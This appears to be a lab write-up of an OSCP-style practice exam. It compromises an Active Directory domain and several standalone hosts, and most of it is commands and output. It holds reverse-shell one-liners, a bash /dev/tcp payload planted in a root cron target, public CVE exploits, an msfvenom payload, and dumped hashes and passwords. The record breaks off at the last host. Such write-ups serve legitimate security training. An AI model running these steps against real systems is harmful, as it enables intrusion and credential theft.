Information
About this lab
This lab involves a sophisticated attack chain against an Active Directory environment. Learners begin by exploiting a vulnerable webapp to achieve remote code execution, followed by privilege escalation Privilege abuse. Through lateral movement, pivoting across network segments, and cracking Kerberos tickets, learners must enumerate and compromise domain assets to achieve full domain control.
Active Directory Set
192.168.202.141 - MS01
Eric.Wallows / EricLikesRunning800
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
81/tcp open hosts2-ns
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
5985/tcp open wsman
Initial Access
Connected to 192.168.202.141 via Evil-WinRM using provided credentials
┌──(kali㉿kali)-[~/oscp_a]
└─$ evil-winrm -i 192.168.202.141 -u 'Eric.Wallows' -p 'EricLikesRunning800'
*Evil-WinRM* PS C:\Users\eric.wallows\Documents>Privilege Escalation
Found SeImpersonatePrivilege enabled on the user
┌──(kali㉿kali)-[~/oscp_a]
└─$ evil-winrm -i 192.168.202.141 -u 'Eric.Wallows' -p 'EricLikesRunning800'
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone EnabledUsed PrintSpoofer64 to escalate privileges to SYSTEM
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> upload PrintSpoofer64.exe
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> upload nc64.exe
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> .\PrintSpoofer64.exe -c "nc64.exe 192.168.45.204 4444 -e powershell"Successfully established reverse shell connection using nc
┌──(kali㉿kali)-[~/oscp_a]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.204] from (UNKNOWN) [192.168.202.141] 55321
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Windows\system32> Post-Exploitation
Added eric.wawllows account to Administrator localgroup
PS C:\Users> net localgroup Administrators eric.wallows /add
net localgroup Administrators eric.wallows /add
The command completed successfully.Dumped credentials using NesExec lsassy module and obtained two NTLM hashes
- celia.almeda:e728ecbadfb02f51ce8eed753f3ff3fd
- Mary.Williams:9a3121977ee93af56ebd0ef4f527a35e
┌──(kali㉿kali)-[~/oscp_a]
└─$ nxc smb 192.168.202.141 -u 'Eric.Wallows' -p 'EricLikesRunning800' -M lsassy
SMB 192.168.202.141 445 MS01 [*] Windows 10 / Server 2019 Build 19041 x64 (name:MS01) (domain:oscp.exam) (signing:False) (SMBv1:False)
SMB 192.168.202.141 445 MS01 [+] oscp.exam\Eric.Wallows:EricLikesRunning800 (Pwn3d!)
LSASSY 192.168.202.141 445 MS01 OSCP\celia.almeda e728ecbadfb02f51ce8eed753f3ff3fd
LSASSY 192.168.202.141 445 MS01 MS01\Mary.Williams 9a3121977ee93af56ebd0ef4f527a35ePivoting
Set up Ligolo-ng proxy server and configured tunnel interface with route to internal network (10.10.162.0/24)
┌──(kali㉿kali)-[~/oscp_a]
└─$ sudo ligolo-proxy -selfcert
[sudo] password for kali:
INFO[0000] Loading configuration file ligolo-ng.yaml
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
Version: dev
ligolo-ng » INFO[0182] Agent joined. id=005056ab00d4 name="NT AUTHORITY\\SYSTEM@MS01" remote="192.168.202.141:53233"
ligolo-ng »
ligolo-ng » session
? Specify a session : 1 - NT AUTHORITY\SYSTEM@MS01 - 192.168.202.141:53233 - 005056ab00d4
[Agent : NT AUTHORITY\SYSTEM@MS01] » interface_create --name ligolo
INFO[0189] Creating a new ligolo interface...
INFO[0189] Interface created!
[Agent : NT AUTHORITY\SYSTEM@MS01] » start
INFO[0192] Starting tunnel to NT AUTHORITY\SYSTEM@MS01 (005056ab00d4)
[Agent : NT AUTHORITY\SYSTEM@MS01] » route_add --name ligolo --route 10.10.162.0/24
INFO[0219] Route created.Executed Ligolo-ng agent to create pivot tunnel
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> .\agent.exe -connect 192.168.45.204:11601 -ignore-cert10.10.162.142 - MS02
Nmap
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsmanLateral Movement (MS01 to MS02)
Used nxc to spray NTLM hashes accross internal hosts and successfully authenticated to MS02 (10.10.162.142) as celia.almeda
┌──(kali㉿kali)-[~/oscp_a]
└─$ nxc winrm 10.10.162.140 10.10.162.142 -u users.txt -H hashes.txt -t 100
WINRM 10.10.162.140 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:oscp.exam)
WINRM 10.10.162.142 5985 MS02 [*] Windows 10 / Server 2019 Build 19041 (name:MS02) (domain:oscp.exam)
WINRM 10.10.162.142 5985 MS02 [+] oscp.exam\celia.almeda:e728ecbadfb02f51ce8eed753f3ff3fd (Pwn3d!)evil-winrm
┌──(kali㉿kali)-[~/oscp_a]└─$ evil-winrm -i 10.10.162.142 -u 'celia.almeda' -H 'e728ecbadfb02f51ce8eed753f3ff3fd' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\celia.almeda\Documents>Privilege Escalation
Downloaded SAM, SYSTEM files
*Evil-WinRM* PS C:\windows.old\Windows\System32> download SAM
*Evil-WinRM* PS C:\windows.old\Windows\System32> download SYSTEMDumped NTLM hashes from SAM database using secretdump
- Administrator:31d6cfe0d16ae931b73c59d7e0c089c0
- tom_admin:4979d69d4ca66955c075c41cf45f24dc
- Cheyanne.Adams:b3930e99899cb55b4aefef9a7021ffd0
- David.Rhys:9ac088de348444c71dba2dca92127c11
- Mark.Chetty:92903f280e5c5f3cab018bd91b94c771
┌──(kali㉿kali)-[~/oscp_a]
└─$ impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x8bca2f7ad576c856d79b7111806b533d
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:acbb9b77c62fdd8fe5976148a933177a:::
tom_admin:1001:aad3b435b51404eeaad3b435b51404ee:4979d69d4ca66955c075c41cf45f24dc:::
Cheyanne.Adams:1002:aad3b435b51404eeaad3b435b51404ee:b3930e99899cb55b4aefef9a7021ffd0:::
David.Rhys:1003:aad3b435b51404eeaad3b435b51404ee:9ac088de348444c71dba2dca92127c11:::
Mark.Chetty:1004:aad3b435b51404eeaad3b435b51404ee:92903f280e5c5f3cab018bd91b94c771:::Used nxc to spray NTLM hashes and successfully authenticated to MS02(10.10.162.142) as tom_admin
┌──(kali㉿kali)-[~/oscp_a]
└─$ nxc winrm 10.10.162.142 -u users.txt -H hashes.txt --continue-on-success -t 100
WINRM 10.10.162.142 5985 MS02 [*] Windows 10 / Server 2019 Build 19041 (name:MS02) (domain:oscp.exam)
WINRM 10.10.162.142 5985 MS02 [-] oscp.exam\Aimee.Hunt:e728ecbadfb02f51ce8eed753f3ff3fd
WINRM 10.10.162.142 5985 MS02 [-] oscp.exam\Carol.Webb:e728ecbadfb02f51ce8eed753f3ff3fd
WINRM 10.10.162.142 5985 MS02 [+] oscp.exam\celia.almeda:e728ecbadfb02f51ce8eed753f3ff3fd (Pwn3d!)
WINRM 10.10.162.142 5985 MS02 [-] oscp.exam\celia.almeda:e728ecbadfb02f51ce8eed753f3ff3fd zip() argument 2 is longer than argument 1
WINRM 10.10.162.142 5985 MS02 [-] oscp.exam\Chelsea.Byrne:e728ecbadfb02f51ce8eed753f3ff3fd
WINRM 10.10.162.142 5985 MS02 [-] oscp.exam\Donna.Johnson:e728ecbadfb02f51ce8eed753f3ff3fd
WINRM 10.10.162.142 5985 MS02 [-] oscp.exam\Emily.Bishop:e728ecbadfb02f51ce8eed753f3ff3fd
WINRM 10.10.162.142 5985 MS02 [-] oscp.exam\eric.wallows:e728ecbadfb02f51ce8eed753f3ff3fd
WIN
WINRM 10.10.162.142 5985 MS02 [+] oscp.exam\tom_admin:4979d69d4ca66955c075c41cf45f24dc (Pwn3d!)Connected to target using Evil-WinRM with tom_admin hash
┌──(kali㉿kali)-[~/oscp_a]
└─$ evil-winrm -i 10.10.162.142 -u 'tom_admin' -H '4979d69d4ca66955c075c41cf45f24dc'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tom_admin\Documents>10.10.162.140 - DC01
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsmanLateral Movement (MS02 to DC01)
Connected to target (10.10.162.140) via Evil-WinRM using previously obatained tom_admin hash
┌──(kali㉿kali)-[~/oscp_a]
└─$ evil-winrm -i 10.10.162.140 -u 'tom_admin' -H '4979d69d4ca66955c075c41cf45f24dc'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tom_admin\Documents> Read proof.txt file
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/12/2025 6:50 AM 34 proof.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type proof.txt
a728672bb26239bb2587cc98b930bb55Independent Challenges
192.168.202.143 - Aero
Nmap
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
81/tcp open hosts2-ns
443/tcp open https
3000/tcp open ppp
3001/tcp open nessus
3003/tcp open cgms
3306/tcp open mysql
5432/tcp open postgresqlInitial Access
Accessed web service on port 81 and found “Attendance and Payroll System” in source code
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Attendance and Payroll System</title>Searched “3003/tcp open cgms” and found CVE-2020-13151
Used CVE-2020-13151 POC exploit
┌──(kali🎃kali)-[~/oscp_a/143/CVE-2020-13151]
└─$ python cve2020-13151.py --ahost 192.168.202.143 --netcatshell --lhost=192.168.45.204 --lport=3000
[+] aerospike build info: 5.1.0.1
[+] looks vulnerable
[+] populating dummy table.
[+] writing to test.cve202013151
[+] wrote MzTztxQFPOETJUBD
[+] registering udf
[+] sending payload, make sure you have a listener on 192.168.45.204:3000.....Successfully established reverse shell connection using nc
┌──(kali🎃kali)-[~]
└─$ rlwrap nc -nlvp 3000
listening on [any] 3000 ...
connect to [192.168.45.204] from (UNKNOWN) [192.168.202.143] 58878
/bin/sh: 0: can't access tty; job control turned off
$ Upgraded shell for convenience
python -c 'import pty; pty.spawn("/bin/bash")'Read local.txt file
aero@oscp:/home/aero$ cat local.txt
cat local.txt
d215e07defe543400153f2fb5c6f30f3Privilege Escalation
Transfered linpeas.sh from Kali to target using SCP for enumeration
aero@oscp:/etc$ scp kali@192.168.45.204:~/oscp_a/tools/linpeas.sh /tmp/
scp kali@192.168.45.204:~/oscp_a/tools/linpeas.sh /tmp/
The authenticity of host '192.168.45.204 (192.168.45.204)' can't be established.
ECDSA key fingerprint is SHA256:vRI4BwMX0mkIFr1rxD1EuPqzvvum/BOX43B/o3MN8ps.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
yes
Warning: Permanently added '192.168.45.204' (ECDSA) to the list of known hosts.
kali@192.168.45.204's password: kali
linpeas.sh 100% 953KB 1.3MB/s 00:00 Found cron job running /root/aerospike.sh as root every minutes using linpeas, but unable to read file contents due to permissions
╔══════════╣ Check for vulnerable cron jobs
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs
══╣ Cron jobs list
*/1 * * * * root /root/aerospike.shFound /opt/aerospike/bin/asadm executing regularly via pspy64s
2025/12/13 17:24:08 CMD: UID=0 PID=65228 | python2.7 /opt/aerospike/bin/asadm --asinfo-mode -e 'STATUS'
2025/12/13 17:24:09 CMD: UID=0 PID=65230 | python2.7 /opt/aerospike/bin/asadm --asinfo-mode -e 'STATUS' Confirmed /opt/aerospike/bin/asadm is writeable by current user (aero)
aero@oscp:/$ ls -al /opt/aerospike/bin/asadm
ls -al /opt/aerospike/bin/asadm
-rwxr-xr-x 1 aero aero 6723733 Dec 7 2019 /opt/aerospike/bin/asadmOverwrote /opt/aerospike/bin/asadm with reverse shell payload
aero@oscp:/$ echo "/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.204/443 0>&1'" > /opt/aerospike/bin/asadm
<92.168.45.204/443 0>&1'" > /opt/aerospike/bin/asadmSuccessfully established reverse shell connection and read proof.txt
┌──(kali🎃kali)-[~/oscp_a/143]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.204] from (UNKNOWN) [192.168.202.143] 50914
bash: cannot set terminal process group (66614): Inappropriate ioctl for device
bash: no job control in this shell
root@oscp:/#
root@oscp:~# cat /root/proof.txt
cat /root/proof.txt
7892ec77669dc931577f4eac740479f5192.168.202.144 - Crystal
Nmap
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open httpInitial Access
Found accessible Git repository using Nmap scripts
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-generator: Nicepage 4.21.12, nicepage.com
|_http-title: Home
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-git:
| 192.168.202.144:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: Security Update
| Remotes:
|_ https://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@github.com/PWK-Challenge-Lab/dev.gitAccess to http service
http://192.168.202.144/.git/
Dumped Git repository using wget
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ wget -r "http://192.168.202.144/.git/"Read Git log
┌──(kali🎃kali)-[~/oscp_a/144/192.168.202.144/.git]
└─$ git log
commit 44a055daf7a0cd777f28f444c0d29ddf3ff08c54 (HEAD -> main)
Author: Stuart <luke@challenge.pwk>
Date: Fri Nov 18 16:58:34 2022 -0500
Security Update
commit 621a2e79b3a4a08bba12effe6331ff4513bad91a (origin/main, origin/HEAD)
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 23:57:12 2022 +0200
Create database.php
commit c9c8e8bd0a4b373190c4258e16e07a6296d4e43c
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 23:56:19 2022 +0200
Delete database.php
commit eda55ed6455d29532295684e3900cda74d695067
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:27:40 2022 +0200
Create robots.txt
commit ce3d418cc1bb5c5388fdc00cee5ba1cb764f499b
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:27:08 2022 +0200
Create search.php
commit 80ad5fe45438bb1b9cc5932f56af2e9be7e96046
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:26:09 2022 +0200
Setting up database.php
commit 58cfadc91978ec5db50a03c571493e3038d2935d
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:22:48 2022 +0200
Create index.php
commit 5e212bcd0b8d5815af1c4fdfccd6a07c16e1330b
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:22:22 2022 +0200
Create order.php
commit 0822a51f607bb05c0e6230acd74f27e7b6130934
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:21:50 2022 +0200
Create export.php
commit 1c48db4a587970ee95208f3f408676505e343318
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:21:11 2022 +0200
Initial commitFound hardcoded credentials from Git commit history
- stuart@challenge.lab / BreakingBad92
┌──(kali🎃kali)-[~/oscp_a/144/192.168.202.144/.git]
└─$ git show 44a055daf7a0cd777f28f444c0d29ddf3ff08c54
commit 44a055daf7a0cd777f28f444c0d29ddf3ff08c54 (HEAD -> main)
Author: Stuart <luke@challenge.pwk>
Date: Fri Nov 18 16:58:34 2022 -0500
Security Update
diff --git a/configuration/database.php b/configuration/database.php
index 55b1645..8ad08b0 100644
--- a/configuration/database.php
+++ b/configuration/database.php
@@ -2,8 +2,9 @@
class Database{
private $host = "localhost";
private $db_name = "staff";
- private $username = "stuart@challenge.lab";
- private $password = "BreakingBad92";
+ private $username = "";
+ private $password = "";
+// Cleartext creds cannot be added to public repos!
public $conn;
public function getConnection() {
$this->conn = null;Authenticated to target via SSH using discovered credentials (stuart)
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ ssh stuart@192.168.202.144
The authenticity of host '192.168.202.144 (192.168.202.144)' can't be established.
ED25519 key fingerprint is: SHA256:NQ0P6b7BgHDdEToc64di95hvEzS2pdZ7E02r4ZBkBYM
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:56: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.202.144' (ED25519) to the list of known hosts.
stuart@192.168.202.144's password:
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-53-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Dec 14 03:15:24 PM UTC 2025
System load: 0.0 Processes: 201
Usage of /: 39.9% of 18.53GB Users logged in: 0
Memory usage: 7% IPv4 address for ens160: 192.168.202.144
Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Mon Oct 31 14:48:02 2022 from 192.168.118.5
stuart@oscp:~$Read local.txt file
stuart@oscp:~$ cat local.txt
cfd945bb16d2480927d571c2deef9ceePrivilege Escalation
Found /opt/backup directory with accessible backup files using linpeas
╔══════════╣ Backup folders
drwxr-xr-x 2 root root 4096 Nov 18 2022 /opt/backup
total 84
-rw-r--r-- 1 stuart stuart 26890 Apr 5 2018 sitebackup1.zip
-rw-r--r-- 1 stuart stuart 24701 Nov 18 2022 sitebackup2.zip
-rw-r--r-- 1 stuart stuart 25312 Mar 5 2020 sitebackup3.zip
drwxr-xr-x 2 root root 3 Apr 15 2020 /snap/core20/1405/var/backups
total 0
drwxr-xr-x 2 root root 3 Apr 15 2020 /snap/core20/1695/var/backups
total 0
drwxr-xr-x 2 root root 4096 Dec 14 15:04 /var/backups
total 724
-rw-r--r-- 1 root root 51200 Dec 14 14:51 alternatives.tar.0
-rw-r--r-- 1 root root 36870 Nov 18 2022 apt.extended_states.0
-rw-r--r-- 1 root root 0 Dec 14 14:51 dpkg.arch.0
-rw-r--r-- 1 root root 268 Oct 31 2022 dpkg.diversions.0
-rw-r--r-- 1 root root 135 Nov 18 2022 dpkg.statoverride.0
-rw-r--r-- 1 root root 636365 Nov 18 2022 dpkg.status.0Downloaded backup files via scp
stuart@oscp:/opt/backup$ scp sitebackup1.zip kali@192.168.45.199:~/oscp_a/144/
The authenticity of host '192.168.45.199 (192.168.45.199)' can't be established.
ED25519 key fingerprint is SHA256:C/sPlE+2KjQOvOF6Xgy+YaE8+67OyeJHsui04dPIApU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.45.199' (ED25519) to the list of known hosts.
kali@192.168.45.199's password:
sitebackup1.zip 100% 26KB 114.0KB/s 00:00
stuart@oscp:/opt/backup$ scp sitebackup2.zip kali@192.168.45.199:~/oscp_a/144/
kali@192.168.45.199's password:
sitebackup2.zip 100% 24KB 109.9KB/s 00:00
stuart@oscp:/opt/backup$ scp sitebackup3.zip kali@192.168.45.199:~/oscp_a/144/
kali@192.168.45.199's password:
sitebackup3.zipAttempted to extract sitebackup3.zip with 7z but password required
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ 7z x sitebackup3.zip
7-Zip 25.01 (x64) : Copyright (c) 1999-2025 Igor Pavlov : 2025-08-03
64-bit locale=en_US.UTF-8 Threads:32 OPEN_MAX:1024, ASM
Scanning the drive for archives:
1 file, 25312 bytes (25 KiB)
Extracting archive: sitebackup3.zip
--
Path = sitebackup3.zip
Type = zip
Physical Size = 25312
Enter password (will not be echoed):Extracted password hashes from zip file using zip2john
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ zip2john sitebackup3.zip > sitebackup3_hashes.hash
ver 2.0 sitebackup3.zip/joomla/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/administrator/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/api/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/cache/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/cli/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/components/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/images/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/includes/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/language/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/language/overrides/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/layouts/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/libs/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/media/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/modules/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/plugins/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/templates/ is not encrypted, or stored with non-handled compression type
ver 2.0 sitebackup3.zip/joomla/tmp/ is not encrypted, or stored with non-handled compression typeCracked zip password using John the Ripper and obtained plaintext password: codeblue
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt sitebackup3_hashes.hash
Using default input encoding: UTF-8
Loaded 19 password hashes with 19 different salts (ZIP, WinZip [PBKDF2-SHA1 128/128 AVX 4x])
Loaded hashes with cost 1 (HMAC size) varying from 28 to 6535
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
codeblue (sitebackup3.zip/joomla/language/.DS_Store)
codeblue (sitebackup3.zip/joomla/includes/app.php)
codeblue (sitebackup3.zip/joomla/web.config.txt)
codeblue (sitebackup3.zip/joomla/cli/joomla.php)
codeblue (sitebackup3.zip/joomla/cli/index.html)
codeblue (sitebackup3.zip/joomla/htaccess.txt)
codeblue (sitebackup3.zip/joomla/LICENSE.txt)
codeblue (sitebackup3.zip/joomla/includes/index.html)
codeblue (sitebackup3.zip/joomla/language/overrides/index.html)
codeblue (sitebackup3.zip/joomla/cache/index.html)
codeblue (sitebackup3.zip/joomla/includes/defines.php)
codeblue (sitebackup3.zip/joomla/README.txt)
codeblue (sitebackup3.zip/joomla/language/index.html)
codeblue (sitebackup3.zip/joomla/.DS_Store)
codeblue (sitebackup3.zip/joomla/includes/framework.php)
codeblue (sitebackup3.zip/joomla/index.php)
codeblue (sitebackup3.zip/joomla/configuration.php)
codeblue (sitebackup3.zip/joomla/robots.txt)
codeblue (sitebackup3.zip/joomla/tmp/index.html)
19g 0:00:00:23 DONE (2025-12-14 10:48) 0.8109g/s 1748p/s 33215c/s 33215C/s holabebe..loserface1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.Extracted zip archive via 7z with cracked password
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ 7z x sitebackup3.zip
7-Zip 25.01 (x64) : Copyright (c) 1999-2025 Igor Pavlov : 2025-08-03
64-bit locale=en_US.UTF-8 Threads:32 OPEN_MAX:1024, ASM
Scanning the drive for archives:
1 file, 25312 bytes (25 KiB)
Extracting archive: sitebackup3.zip
--
Path = sitebackup3.zip
Type = zip
Physical Size = 25312
Enter password (will not be echoed):
Everything is Ok
Folders: 17
Files: 19
Size: 67063
Compressed: 25312Searched for password in extracted files and found credentials in configuration.php
┌──(kali🎃kali)-[~/oscp_a/144/joomla]
└─$ grep -r -i 'passw' *
configuration.php: public $password = 'Password@1';Discovered username and password in configuration.php: chloe / Ee24zIK4cDhJHL4H
┌──(kali🎃kali)-[~/oscp_a/144/joomla]
└─$ cat configuration.php
<?php
class JConfig {
public $offline = false;
public $offline_message = 'This site is down for maintenance.<br>Please check back again soon.';
public $display_offline_message = 1;
public $offline_image = '';
public $sitename = 'Challenge Lab';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = 20;
public $access = 1;
public $debug = false;
public $debug_lang = false;
public $debug_lang_const = true;
public $dbtype = 'mysql';
public $host = 'localhost';
public $user = 'joomla';
public $password = 'Password@1';
public $db = 'jooml';
public $dbprefix = 'o83rl_';
public $dbencryption = 0;
public $dbsslverifyservercert = false;
public $dbsslkey = '';
public $dbsslcert = '';
public $dbsslca = '';
public $dbsslcipher = '';
public $force_ssl = 0;
public $live_site = '';
public $secret = 'Ee24zIK4cDhJHL4H';Switched to chloe user account with discovered credentials
stuart@oscp:~$ su chloe
Password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
chloe@oscp:/home/stuart$Confirmed chloe has full sudo privileges (All : ALL) and escalated to root
chloe@oscp:/home/stuart$ sudo -l
[sudo] password for chloe:
Matching Defaults entries for chloe on oscp:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User chloe may run the following commands on oscp:
(ALL : ALL) ALL
chloe@oscp:/home/stuart$
chloe@oscp:/home/stuart$ sudo su -
root@oscp:~#Read proof.txt file
root@oscp:~# cat /root/proof.txt
7ca5ec703d5a4a2074b6fe1153db351a192.168.202.145 - Hermes
Nmap
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1978/tcp open unisql
3389/tcp open ms-wbt-server
7680/tcp open pando-pub
161/udp open snmpInitial Access
Searched for “1978/tcp open unisql” and found CVE on Exploit-DB, prepared reverse shell binary and started Python HTTP server for POC
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.204 LPORT=4444 -f exe -o payload.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes
Saved as: payload.exe
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ l
49601 payload.exe scan whatweb
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...Executed POC exploit
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ python2 49601 192.168.202.145 192.168.45.204:8000 payload.exe
[+] 3..2..1..
[+] *Super fast hacker typing*
[+] Retrieving payload
[+] Done! Check Your Listener?Successfully established reverse shell connection
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.204] from (UNKNOWN) [192.168.202.145] 50609
Microsoft Windows [Version 10.0.19041.1]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32Read local.txt file
PS C:\Users\offsec\Desktop> dir
dir
Directory: C:\Users\offsec\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/15/2025 5:07 AM 34 local.txt
PS C:\Users\offsec\Desktop> type local.txt
type local.txt
